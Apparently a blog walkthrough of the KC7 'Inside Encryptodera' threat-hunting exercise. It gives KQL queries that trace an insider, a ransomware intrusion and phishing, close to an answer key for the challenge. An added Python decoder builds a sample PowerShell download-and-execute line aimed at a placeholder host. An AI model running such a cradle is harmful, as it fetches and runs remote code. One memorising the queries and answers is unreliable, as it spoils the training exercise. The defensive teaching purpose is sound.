This post is a write-up with clues for solving the KC7 investigation case Inside Encryptodera. Use it as a guide when you get stuck; it is structured as a fill-in-the-blanks solution, so the queries narrow the data down and the final answer is left for you to read off the results.
Section 1: Offensive Odor 👽
Question 1: What is Barry’s role at the company?
Employees
| where name contains "Barry"
| project name , role
Question 2: What is Barry’s email address?
Employees
| where name contains "Barry"
| project name , role, email_addr
Question 3: What was the subject of the interesting email (the one on January 16th) that Barry sent?
Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where timestamp between (datetime(2024-01-16T00:00:00Z) .. datetime(2024-01-16T23:59:59Z))
| project timestamp, recipient, subject
Question 4: What was the role of the employees that received Barry’s email?
- Find the list of the recipients.
Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where subject == "I'm not coming in today. I'm sick of this place. We're all getting laid off anyway."
- Find the role.
Employees
| where email_addr in ("christopher_naylor@encryptoderafinancial.com", "michelle_collins@encryptoderafinancial.com", "jarrod_rodriguez@encryptoderafinancial.com")
| distinct role
- Advanced operators:
Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where subject == "I'm not coming in today. I'm sick of this place. We're all getting laid off anyway."
| project recipient
| join kind=inner (
Employees
| project email_addr, role
) on $left.recipient == $right.email_addr
| distinct role
Question 5: What was the role of the recipient of that email?
Email
| where subject == "YOU ARE A GREEDY PIG!!!! WHAT IS WRONG WITH YOU?????"
Employees
| where email_addr == "les_goh@encryptoderafinancial.com"
| project role
Question 6: What’s Barry’s IP address? (Paste the full IP address )
Employees
| where name contains "Barry"
| project ip_addr
Question 7: What was the complete URL that Barry was browsing on his computer regarding Cybersecurity Insiders on the afternoon of December 26th?(Paste the full url)
OutboundNetworkEvents
| where src_ip == "10.10.0.1"
| where url contains "Insiders"
| project timestamp, url
The question asks for the afternoon of December 26th, so pick the row whose timestamp falls on that afternoon if more than one URL comes back.
Question 8: What website did he visit first on January 15th? (Paste the full URL)
OutboundNetworkEvents
| where src_ip == "10.10.0.1"
| where timestamp >= datetime(2024-01-15T00:00:00Z)
| top 1 by timestamp asc
| project url
Question 9: Could you provide the full URL for the website Barry searched for USB Flash Drives?
OutboundNetworkEvents
| where src_ip == "10.10.0.1"
| where url contains "usb"
| project url
Question 10: What “secret” document on business transactions did Barry download?
InboundNetworkEvents
| where src_ip == "10.10.0.1"
| where url contains "secret"
| project url
Question 11: What document (docx) did Barry download about salaries?
InboundNetworkEvents
| where src_ip == "10.10.0.1" and url contains "salary" and url contains "docx"
| project url
- Advanced operators: parse the URL and keep only the last path segment, which is the file name.
InboundNetworkEvents
| where src_ip == "10.10.0.1" and url contains "salary" and url contains "docx"
| extend parsed_url = parse_url(url)
| extend path_segments = split(parsed_url["Path"], "/")
| project FileName = tostring(path_segments[-1])
The same extraction condensed into a single extend:
InboundNetworkEvents
| where src_ip == "10.10.0.1" and url contains "salary" and url contains "docx"
| extend fileName = tostring(split(parse_url(url)["Path"], "/")[-1])
| project fileName
Question 12: What document (zip) did Barry download to get this?
InboundNetworkEvents
| where src_ip == "10.10.0.1"
| where url contains "zip"
| extend fileName = tostring(split(parse_url(url)["Path"], "/")[-1])
| project fileName
Question 13: Do you know the password he used to zip the files?
We know the file name is Encryptodera_Proprietary_Algorithms.zip. Searching ProcessEvents for it shows the parent_process_hash 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f.
ProcessEvents
| where process_commandline contains "Encryptodera_Proprietary_Algorithms.zip"
I then narrowed the results to the day of the event, the host and that parent process hash to shorten the list and find the password in the command line.
ProcessEvents
| where timestamp between (datetime(2024-01-16T00:00:00Z) .. datetime(2024-01-16T23:59:59Z))
| where hostname == "IGOY-DESKTOP"
| where parent_process_hash == "614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f"
Question 14: What is the name of the drive on which Barry stored the final files?
The answer is in the same results as question 13: the command line shows the destination drive.
ProcessEvents
| where timestamp between (datetime(2024-01-16T00:00:00Z) .. datetime(2024-01-16T23:59:59Z))
| where hostname == "IGOY-DESKTOP"
| where parent_process_hash == "614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f"
Section 2: Crypto Conquest
Question 1: What is the filename of this note?
Do you see it? It is the .txt file name.
FileCreationEvents
| where path contains "GIMME"
| distinct filename
Question 2: What kind of attack is this?
Data Encrypted for Impact (T1486).
Question 3: On how many machines was this .txt file seen?
FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| distinct hostname
| count
Question 4: What time was the ransom note first seen?
FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| top 1 by timestamp asc
| project timestamp
Question 5: What is the hostname of the system where the ransom note was first seen?
FileCreationEvents
| where path has "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| top 1 by timestamp asc
| project timestamp, hostname
Question 6: How many files were encrypted on this machine?
The question gives us the hostname UL8R-MACHINE and the date 2024-02-17. The following KQL lists the file activity on that host from that day on:
FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where timestamp >= datetime(2024-02-17)
After adding | distinct filename to the KQL above, I found two files that don't end with .umadbro: files_go_byebye.exe and YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt.
That is enough to find the answer, but let me stretch my brain with a challenge. In the filename column I found three extension types: .txt, .exe and .umadbro. Suppose there were many more; instead of scrolling, I want an efficient way to list every file type and how often it occurs.
FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where timestamp >= datetime(2024-02-17)
| extend FileExtension = tostring(split(filename, ".")[-1])
| project FileExtension
| summarize Count = count() by FileExtension
| sort by Count desc
- extend FileExtension = tostring(split(filename, ".")[-1]): the extend operator creates a new column called FileExtension.
- split(filename, "."): splits the filename on the dot (".") character, producing an array of substrings.
- [-1]: takes the last element of that array, which is the file extension.
- tostring(): converts the extracted extension to a string before it is stored in the FileExtension column.
- summarize Count = count() by FileExtension: counts the rows per extension, and sort by Count desc puts the most common extension first.
Question 7: What is the extension that was used on the encrypted files?
The answer is the extension with the most count from the answer to question number 6.
Question 8: What command was run that references the ransomware extension?
The question provides the KQL, and the answer is the value in process_commandline.
Question 9: When did files_go_byebye.exe appear on this machine?
FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where filename contains "byebye"
| project timestamp
Question 10: How many commands were run on UL8R-MACHINE during this timeframe?
The question provides the KQL; read the count of records from the results, or add | count at the end of the query.
Question 11: What domain does the encoded PowerShell reference?
ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
| distinct process_commandline
The question gives us the hint "powershell". I added the following line to reduce the number of rows to analyze.
| where process_commandline contains "powershell"
Copy the base64 blob and decode it with your favorite tool, script or an online Base64 decoder. One caveat: PowerShell's -EncodedCommand argument is base64 of the script encoded as UTF-16LE, so decode it as UTF-16LE; a plain UTF-8 decode shows the text with a NUL byte between every character.
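As an added example (not part of the original write-up, and not the case data), the following Python script decodes -EncodedCommand blobs from process command lines the way you would for question 11. It detects whether the blob is UTF-16LE (what PowerShell itself produces) or plain UTF-8, and pulls the hostnames out of any URLs in the decoded script. The sample command lines and the stager.example.invalid hostname are constructed placeholders.

```python
"""Decode PowerShell -EncodedCommand blobs from process command lines.

Added example for this write-up; the command lines below are constructed
for illustration and are not the Encryptodera case data.
"""
import base64
import re
from typing import Optional

# -EncodedCommand and its accepted abbreviations, followed by the base64 blob.
ENC_SWITCH = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Host part of any http(s) URL found in a decoded script.
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell expects: UTF-16LE bytes, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def looks_utf16le(raw: bytes) -> bool:
    """ASCII text encoded as UTF-16LE has a NUL byte in every odd position."""
    return len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])


def decode_blob(b64: str) -> str:
    """Decode a base64 blob, choosing UTF-16LE (PowerShell's encoding) or falling back to UTF-8."""
    raw = base64.b64decode(b64)
    if looks_utf16le(raw):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script from a command line, or None if it has no -enc switch."""
    m = ENC_SWITCH.search(cmdline)
    return decode_blob(m.group(1)) if m else None


def hosts_in(script: str) -> list[str]:
    """Hostnames referenced by URLs in the decoded script (deduplicated, lower-case)."""
    return sorted({m.group(1).lower() for m in URL_HOST.finditer(script)})


# Constructed sample command lines (the hostname is a placeholder, not case data).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://stager.example.invalid/s.ps1')"
SAMPLE_COMMANDS = [
    # What PowerShell itself produces: UTF-16LE, then base64.
    "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_powershell(STAGER),
    # The same script base64'd as UTF-8 (as seen in FromBase64String payloads);
    # PowerShell would not run this as -enc, but the decoder must not emit garbage for it.
    "powershell.exe -enc " + base64.b64encode(STAGER.encode("utf-8")).decode("ascii"),
    # No encoded command at all.
    "cmd.exe /c gpupdate /force",
]


def triage(cmdlines: list[str]) -> list[tuple[str, Optional[str], list[str]]]:
    """For each command line: the original, the decoded script (if any), and the hosts it references."""
    out = []
    for c in cmdlines:
        script = decode_encoded_command(c)
        out.append((c, script, hosts_in(script) if script else []))
    return out


if __name__ == "__main__":
    for original, script, hosts in triage(SAMPLE_COMMANDS):
        print(original[:50], "->", script, hosts)
```

Paste the real command lines from the ProcessEvents results into SAMPLE_COMMANDS to get the decoded script and the domain it references. The NUL-byte heuristic is what tells the two encodings apart; if a blob decodes to readable text under neither, it is probably compressed or double-encoded and needs another pass.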
Question 12: What command is run right before the base64-encoded PowerShell?
The results of the KQL from question 11 already show the preceding command. Alternatively, take the timestamp of the encoded PowerShell event and ask for the last command run before it:
ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp < datetime(2024-02-17T02:29:53Z)
| project timestamp , process_commandline
| top 1 by timestamp desc
Question 13: How many devices ran the gpupdate /force command?
ProcessEvents
| where process_commandline has "gpupdate /force"
| distinct hostname
| count
Question 14: How many machines at Encryptodera ran “systeminfo”?
The question asks for machines, not events, so deduplicate on hostname before counting; a plain | count would count every execution.
ProcessEvents
| where process_commandline has "systeminfo"
| distinct hostname
| count
Question 15: What was the timestamp for the first time the command was run?
ProcessEvents
| where process_commandline has "systeminfo"
| top 1 by timestamp asc
Question 16: How many days elapsed between when the attackers ran discovery commands and when the ransomware attack started?
Calculate the date 🤯! Subtract the timestamp of the first systeminfo run (question 15) from the timestamp when the ransom note was first seen (question 4) and count the whole days in between.
Question 17: What is the hostname of the device on which the attackers first ran systeminfo?
ProcessEvents
| where process_commandline contains "systeminfo"
| project timestamp , hostname
| top 1 by timestamp asc
Question 18: What was the full commandline used by the threat actor when running nltest /dclist? (paste the full commandline)
ProcessEvents
| where process_commandline contains "nltest /dclist"
| project timestamp, hostname, process_commandline
Question 19: What is the full name of the .xlsx.exe file on 41QI-LAPTOP?
FileCreationEvents
| where hostname == "41QI-LAPTOP"
| where path contains ".xlsx.exe"
| project filename
Question 20: What file shows up a few seconds after the .xlsx.exe file?
FileCreationEvents
| where hostname == "41QI-LAPTOP"
| where timestamp > datetime(2024-02-01T08:50:12Z)
| top 1 by timestamp asc
| project timestamp , hostname, filename
Question 21: How many devices does screenconnect_client.exe appear on?
Count distinct hosts rather than file creation events, since the file can be written more than once on the same device.
FileCreationEvents
| where filename contains "screenconnect_client.exe"
| distinct hostname
| count
Question 22: Check the Email logs to see if the .xlsx.exe file was sent in a link. What email address was used to send this file?
Email
| where link contains "xlsx.exe"
| distinct sender
Question 23: How many unusual emails were sent by Barry?
Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where timestamp > (datetime("2024-02-01"))
| distinct subject
| count
Question 24: Type got it once you’ve made a note of these recipients.
got it
Question 25: What IP was used to sign into Barry’s account on February 1st?
The AuthenticationEvents table can be filtered by username. To find Barry's username, look it up in the Employees table.
Employees
| where name contains "Barry"
| project name, username
AuthenticationEvents
| where username == "bashmelly"
| where timestamp between (datetime('2024-02-01T00:00:00Z') .. datetime('2024-02-01T23:59:59Z'))
| order by timestamp desc
Question 26: How many other accounts did that IP log into?
AuthenticationEvents
| where src_ip == "143.38.175.105"
| distinct username
Remember that the question asks for other accounts, so leave Barry's own account (bashmelly) out of the count.
Question 27: How many IPs logged in to all 8 devices where the attacker ran systeminfo?
let hosts = ProcessEvents
| where process_commandline has "systeminfo"
| distinct hostname;
AuthenticationEvents
| where hostname in (hosts)
| summarize dcount(hostname) by src_ip
| order by dcount_hostname desc
Question 28: What is the role of the employee who this IP address belongs to?
Employees
| where ip_addr == "10.10.0.138"
| project role
Question 29: How many successful logins were made from this IP?
AuthenticationEvents
| where src_ip == "10.10.0.138"
| where result == "Successful Login"
| count
Question 30: What is the hostname of the server the attackers logged into?
AuthenticationEvents
| where src_ip == "10.10.0.138"
| where result == "Successful Login"
| where hostname contains "server" and hostname !contains "mail"
Section 3: F in the chat
Question 1: What username was used to log into the DOMAIN_CONTROLLER_SERVER?
AuthenticationEvents
| where hostname == "DOMAIN_CONTROLLER_SERVER"
| distinct username
Question 2: What laptop did the lihenry_domain_admin account sign into?
AuthenticationEvents
| where username == "lihenry_domain_admin"
| project hostname
Just for Kqling!
let SusUserName = AuthenticationEvents
| where hostname == "DOMAIN_CONTROLLER_SERVER"
| project username;
AuthenticationEvents
| where username in (SusUserName)
| project hostname, username
Question 3: What is the MITRE ATT&CK ID for mimikatz?
Mimikatz is tracked in MITRE ATT&CK as software entry S0002.
Question 4: Did the threat actor run mimikatz on this device? If so, enter the command line the attacker ran. If not, enter no.
ProcessEvents
| where process_commandline contains "mimikatz"
| distinct process_commandline
Question 5: Who does this device belong to? (Enter the employee’s name)
The question is asking about the device from question 4.
Employees
| where hostname == "GJ95-LAPTOP"
| project name
Question 6: Was Valerie Orozco targeted in the phishing emails sent from Barry Shmelly?
We all know! Yes.
Question 7: What is the name of the file that was sent to Valerie in the phishing email?
The sender's email address is already known from Section 1 (Offensive Odor). Valerie's email address is in the Employees table.
Employees
| where name contains "Valerie Orozco"
| project email_addr
Email
| where sender == "barry_shmelly@encryptoderafinancial.com"
| where recipient == "valerie_orozco@encryptoderafinancial.com"
| project link
| extend fileName = tostring(split(parse_url(link).Path, "/")[-1])
| project fileName
The expression | extend fileName = tostring(split(parse_url(link).Path, "/")[-1]) extracts the last part of the URL in the link column, which is the file name:
- extend fileName = : the extend operator adds a new column called fileName holding the extracted value.
- parse_url(link).Path: extracts the path portion of the URL from the link column.
- split(..., "/"): splits the path into an array of strings, using / as the delimiter.
- [-1]: selects the last element of the array, which is the file name.
- tostring(): converts the extracted value to a string type.
Question 8: Did Valerie click the link? If so, enter the timestamp when she clicked the link. If not, enter ’no'
OutboundNetworkEvents
| where url has "Employee_Contact_List_Updated_March_2024.docx.exe"
| where src_ip == "10.10.0.18"
Question 9: How many different user accounts logged into Valerie’s machine?
AuthenticationEvents
| where hostname == "GJ95-LAPTOP"
| distinct username
| count
Question 10: How many unique hosts did this user account attempt to log into?
AuthenticationEvents
| where username == "systadmi_local_admin"
| distinct hostname
| count
Question 11: Which user NOT in an IT role was improperly using the systadmi_local_admin credentials? (This is likely a sign of compromise)
You Got this 👾
Question 12: When was Robin phished by Barry Shmelly’s account?
let employeeEmail = Employees
| where name == "Robin Kirby"
| project email_addr;
Email
| where recipient in (employeeEmail) and sender == "barry_shmelly@encryptoderafinancial.com"
| project timestamp
Community Help
Join the KC7 Discord (#encryptodera) to discuss the module.
